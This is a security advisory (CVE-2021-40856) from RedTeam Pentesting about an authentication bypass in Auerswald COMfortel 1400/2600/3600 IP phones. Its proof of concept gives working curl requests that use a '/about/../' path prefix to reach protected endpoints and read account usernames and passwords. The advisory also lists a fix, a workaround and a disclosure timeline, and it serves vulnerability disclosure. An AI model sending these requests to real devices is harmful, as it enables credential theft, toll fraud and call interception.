Auerswald COMfortel 1400/2600/3600 IP Authentication Bypass
RedTeam Pentesting discovered a vulnerability in the web-based configuration management interface of the Auerswald COMfortel 1400 and 2600 IP desktop phones. The vulnerability allows accessing configuration data and settings in the web-based management interface without authentication.
Details
- Product: Auerswald COMfortel 1400 IP, COMfortel 2600 IP, COMfortel 3600 IP
- Affected Versions: <= 2.8F
- Fixed Versions: 2.8G (for COMfortel 1400 IP, COMfortel 2600 IP, COMfortel 3600 IP)
- Vulnerability Type: Authentication Bypass
- Security Risk: high
- Vendor URL:
https://www.auerswald.de - Vendor Status: fixed version released
- Advisory URL:
https://www.redteam-pentesting.de/advisories/rt-sa-2021-004 - Advisory Status: published
- CVE: CVE-2021-40856
- CVE URL:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40856
Introduction
“The COMfortel 2600 IP is an Android-based hybrid VoIP telephone (SIP and IP system phone), with 4.3” colour touch display and preconfigured answering machine"
(from the vendor’s homepage)
More Details
During a penetration test it was discovened that several VoIP phones (COMfortel 2600 and 1400 IP) by the manufacturer Auerswald allow accessing administrative functions without login credentials, bypassing the authentication. This can be achieved by simply prefixing API endpoints that require authentication with “/about/../”, since the “/about” endpoint does not require any authentication.
Proof of Concept
The phones run a web-based management interface on Port 80. If accessed, the HTTP response code 401 together with a website redirecting to the path “/statics/pageChallenge.html” is returned. This can for example be seen using the command-line HTTP client curl (https://curl.se) as follows:
$ curl --include 'http://192.168.1.190/'
HTTP/1.1 401 Unauthorized
[...]
<!DOCTYPE html><html><head><meta http-equiv='refresh' content='0;
URL=/statics/pageChallenge.html'></head><body></body></html>
The website contains JavaScript code that requests the path “/about?action=get” and loads a JSON document (formatted and shortened to increase readability):
$ curl --include 'http://192.168.1.190/about?action=get'
HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8;
Cache-Control: no-cache
Content-Length: 3673
Date: Mon, 30 Aug 2021 08:39:24 GMT
Server: lighttpd
{
"DATA": {
"firmware": {
"TYPE": "DATAITEM",
"VALUE": "2.8E",
"KEY": "firmware"
},
"serial": {
"TYPE": "DATAITEM",
"VALUE": "1234567890",
"KEY": "serial"
},
[...]
}
}
Among other information, this JSON document contains the serial number and firmware version displayed on the website. This action can be accessed without authentication. Other endpoints require authentication, for example the path “/tree?action=get”, from which the menu structure is loaded after successful authentication:
$ curl --include 'http://192.168.1.190/tree?action=get'
HTTP/1.1 401 Unauthorized
[...]
<!DOCTYPE html><html><head><meta http-equiv='refresh' content='0;
URL=/statics/pageChallenge.html'></head><body></body></html>
During the penetration test, it was discovered that this action can successfully be requested by inserting the prefix “/about/../”. In order to prevent curl from normalizing the URL path, the option “–path-as-is” must be supplied:
$ curl --include --path-as-is \
'http://192.168.1.190/about/../tree?action=get'
HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8;
Cache-Control: no-cache
Content-Length: 3808
Date: Mon, 30 Aug 2021 08:42:11 GMT
Server: lighttpd
{
"TYPE": "TREENODEPAGE",
"ITEMS": {
"COUNT": 2,
"TYPE": "ITEMLIST",
"1": {
"id": 31,
"text": "applications_settings",
"TYPE": "TREENODEPAGE",
"ITEMS": {
"COUNT": 1,
"TYPE": "ITEMLIST",
"0": {
"target": "pageFunctionkeys.html",
"id": 32,
"action": "/functionkeys",
"text": "key_app",
"pagename": "Functionkeys",
"TYPE": "TREENODEPAGE"
}
}
},
[...]
}
}
The endpoint “/account” allows listing account data:
$ curl --include --path-as-is \
'http://192.168.1.190/about/../account?action=list'
HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8;
Cache-Control: no-cache
Content-Length: 793
Date: Mon, 30 Aug 2021 08:43:33 GMT
Server: lighttpd
{
"DATA": {
[...]
"accountList0": {
"KEY": "accountList0",
"COUNT": 1,
"TYPE": "DATAMODEL",
"VALUE": {
"0": {
"ID": 32327,
"PARENTID": 0,
"PROVIDER": "ProviderName",
"NAME": "123 Example User",
"STATUS": 4,
"DEFAULT": 1
}
},
[...]
},
}
}
The ID 32327 can then be used to get details about that particular account, including the username and password:
$ curl --include --path-as-is \
'http://192.168.1.190/about/../account?action=get&itemID=32327'
HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8;
Cache-Control: no-cache
Content-Length: 2026
Date: Mon, 30 Aug 2021 08:44:13 GMT
Server: lighttpd
{
"DATA": {
[...]
"Benutzer": {
"TYPE": "DATAITEM",
"VALUE": "123",
"KEY": "Benutzer"
},
"Passwort": {
"TYPE": "DATAITEM",
"VALUE": "secret",
"KEY": "Passwort"
},
[...]
}
}
Using a script for Zed Attack Proxy (https://github.com/zaproxy/zaproxy/), RedTeam Pentesting managed to access and use the web-based management interface as if regular login credentials were presented.
It is likely that other functionality can be accessed in the same way, to for example change settings or activate the integrated option for recording the Ethernet traffic.
Workaround
Disable the web-based management interface if possible.
Fix
Upgrade to a firmware version which corrects this vulnerability.
Security Risk
Inserting the prefix “/about/../” allows bypassing the authentication check for the web-based configuration management interface. This enables attackers to gain access to the login credentials used for authentication at the PBX, among other data.
Attackers can then authenticate at the PBX as the respective phone and for example call premium rate phone lines they operate to generate revenue. They can also configure a device they control as the PBX in the phone, so all incoming and outgoing phone calls are intercepted and can be recorded. The device also contains a function to record all Ethernet data traffic, which is likely affected as well.
Overall, the vulnerability completely bypasses the authentication for the web-based management interface and therefore poses a high risk.
Timeline
- 2021-08-26 Vulnerability identified
- 2021-09-01 Customer approved disclosure to vendor
- 2021-09-10 Vendor notified
- 2021-09-10 CVE ID requested
- 2021-09-10 CVE ID assigned
- 2021-10-04 Vendor provides access to device with fixed firmware
- 2021-10-05 RedTeam Pentesting examines device, vulnerability seems to be corrected
- 2021-10-14 Vendor releases corrected firmware version 2.8G
- 2021-12-06 Advisory published
RedTeam Pentesting GmbH
RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately.
As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories.
More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/
Working at RedTeam Pentesting
RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://jobs.redteam-pentesting.de/